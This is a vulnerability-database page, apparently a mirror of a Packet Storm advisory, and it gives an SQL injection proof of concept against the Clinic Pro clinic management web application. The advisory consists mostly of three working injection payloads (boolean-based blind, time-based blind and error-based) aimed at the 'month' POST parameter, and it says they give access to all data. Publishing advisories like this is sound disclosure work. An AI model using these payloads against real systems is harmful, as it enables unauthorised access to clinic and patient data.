Lucene search
K
Database
Vendors
Products
Years
CVSS
Scanner
Agent Scanning
API Scanning
Manual Audit
Perimeter Scanner
Scanning
Projects
Email
Webhook
Plugins
Resources
Documents
Blog
Glossary
FAQ
Pricing
Contacts
About Us
Partners
Branding Guideline
packetstormAbdullah CelebiPACKETSTORM:152378
HistoryApr 03, 2019 - 12:00 a.m.

Clinic Pro 4 SQL Injection

2019-04-0300:00:00
Abdullah Celebi
packetstormsecurity.com
41
JSON
`# Title: Clinic Pro - Clinic Management Software  
# Date: 03.04.2019  
# Exploit Author: Abdullah Γ‡elebi  
# Vendor Homepage: https://softwebinternational.com  
# Software Link: https://cms.softwebinternational.com  
# Category: Webapps  
# Tested on: WAMPP @Win  
# Software description:  
It is developed by PHP Codeigniter Framework with HMVC Pattern. Clinic  
system can be easily configured and fully automated as per clinic  
requirement using this Automation Software.  
  
# Vulnerabilities:  
# An attacker can access all data following an authorized user login using  
the parameter.  
  
  
# POC - SQLi :  
  
# Parameter: month (POST)  
# Request URL: http://localhost/welcome/monthly_expense_overview  
# Type : boolean-based blind  
month=06%' RLIKE (SELECT (CASE WHEN (9435=9435) THEN 06 ELSE 0x28 END)) AND  
'%'='  
  
# Type : time-based blind  
month=06%' AND 4514=BENCHMARK(5000000,MD5(0x436d7970)) AND '%'='  
  
# Type : error-based  
month=06%' AND EXTRACTVALUE(2633,CONCAT(0x5c,0x7178766271,(SELECT  
(ELT(2633=2633,1))),0x7171717171)) AND '%'='  
`
JSON